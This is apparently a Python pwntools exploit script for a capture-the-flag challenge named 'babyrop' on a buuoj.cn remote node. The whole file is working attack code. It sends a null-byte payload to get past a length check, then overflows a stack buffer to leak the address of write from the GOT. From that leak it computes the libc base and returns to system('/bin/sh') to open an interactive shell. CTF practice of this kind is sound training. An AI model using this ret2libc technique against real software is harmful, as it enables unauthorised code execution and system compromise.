from pwn import *
p=remote("node4.buuoj.cn",27881)

#p=process("./babyrop")
#context(arch='i386',os='linux',log_level='debug')
elf=ELF("./babyrop")
libc=ELF("./libc-2.23.so")
write_plt=elf.plt['write']
write_got=elf.got['write']
read_plt=elf.plt['read']
read_got=elf.got['read']
main=0x08048825
#p.sendline(b'300')

payload1=b'\0'+b'\xff'*7
p.sendline(payload1)
p.recv()
payload2=b'a'*(0xe7+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload2)
write_addr=u32(p.recv(4))
print(hex(write_addr))
#pause()
offset=write_addr-libc.sym['write']
system=offset+libc.sym['system']
binsh=offset+libc.search(b'/bin/sh').__next__()
p.sendline(payload1)
payload3=b'a'*(0xe7+4)+p32(system)+p32(main)+p32(binsh)
p.sendline(payload3)
p.interactive()